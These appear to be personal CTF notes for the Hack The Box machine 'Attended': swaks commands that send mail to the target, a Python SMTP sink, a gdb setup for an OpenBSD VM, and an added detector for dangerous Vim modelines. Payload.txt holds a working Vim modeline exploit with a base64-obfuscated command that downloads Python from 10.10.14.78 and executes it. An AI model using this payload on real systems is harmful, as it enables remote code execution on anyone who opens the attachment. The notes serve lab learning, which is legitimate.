xct's notes
Attended
Notes for https://youtu.be/uAvvrBO7zlk

User

Send mails via swaks

1) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
2) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
3) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb --attach payload.txt

Mail Server

# Minimal SMTP sink that prints every message it receives.
# Needs Python 3.6 to 3.11: smtpd and asyncore were removed in Python 3.12.
import asyncore
from smtpd import SMTPServer


class EmlServer(SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data,
                        mail_options=None, rcpt_options=None):
        print(f"From: {mailfrom}")
        print(f"To: {rcpttos}")
        print("Data:")
        # data arrives as bytes because decode_data defaults to False
        for line in data.split(b"\n"):
            print(line)


def run():
    # Listen on all interfaces; binding to port 25 needs root privileges
    EmlServer(('0.0.0.0', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        pass


if __name__ == '__main__':
    run()

Payload.txt

This pulls a Python file called "x" from our web server and executes it:

:!echo aW1wb3J0IHJlcXVlc3RzIGFzIHI7ZXhlYyhyLmdldCgnaHR0cDovLzEwLjEwLjE0Ljc4L3gnKS50ZXh0KQ==| openssl base64 -d -A | python2.7 -
||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="
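A defender-side check for mail attachments, added here as an example and not part of the original notes: it flags Vim modelines that set expression-valued options, such as the fde and fdt settings in Payload.txt above. The function name, the option list and the sample text (the modeline from Payload.txt with its command line replaced by a placeholder) are assumptions of this example.

```python
import re

# Options whose value Vim evaluates as an expression (long and short names).
# The list is an assumption of this example and is not exhaustive.
EXPR_OPTIONS = {"foldexpr", "fde", "foldtext", "fdt", "formatexpr", "fex",
                "indentexpr", "inde", "includeexpr", "inex"}
# A modeline marker must start the line or follow whitespace: vi:, vim:, ex:
MODELINE = re.compile(r"(?:^|\s)(?:vi|[Vv]im(?:[<=>]?\d+)?|ex):\s*(.*)$")
# Options are separated by ':' or whitespace unless backslash-escaped.
SEPARATOR = re.compile(r"(?<!\\)[:\s]+")
OPTION = re.compile(r"^([a-z]+)(?:[+^-]?=(.*))?$")


def find_expr_modelines(text, window=5):
    """Return (line_no, option, value) for expression options set in modelines.

    Vim only reads modelines in the first and last 'modelines' lines of a
    file (default 5), so only those lines are inspected.
    """
    lines = text.splitlines()
    index = range(len(lines))
    candidates = sorted(set(index[:window]) | set(index[-window:]))
    hits = []
    for i in candidates:
        found = MODELINE.search(lines[i])
        if not found:
            continue
        # Second modeline form: "vim: set opt opt:" -> drop the leading "set"
        body = re.sub(r"^set?\s+", "", found.group(1))
        for token in SEPARATOR.split(body):
            opt = OPTION.match(token)
            if opt and opt.group(1) in EXPR_OPTIONS:
                hits.append((i + 1, opt.group(1), opt.group(2) or ""))
    return hits


# Constructed sample: line 1 is a placeholder, line 2 is the modeline above.
SAMPLE_ATTACHMENT = (
    "<command line omitted>\n"
    r'''||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="''' "\n"
)

if __name__ == "__main__":
    for line_no, option, value in find_expr_modelines(SAMPLE_ATTACHMENT):
        print(f"line {line_no}: modeline sets {option} = {value!r}")
```

A mail gateway can quarantine text attachments for which this returns hits; on the reading host, `set nomodeline` in the vimrc stops Vim from parsing modelines at all.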

HTTP Reverse Shell

Root

Prepare OpenBSD VM

export PKG_PATH=https://mirror.fsrv.services/pub/OpenBSD/6.8/packages/amd64/
pkg_add -v gdb
pkg_add wget
pkg_add nano
pkg_add py3-pip
pkg_add git
wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
export LC_CTYPE=C.UTF-8
egdb

EAX-Finder

Final Exploit

Last modified 5mo ago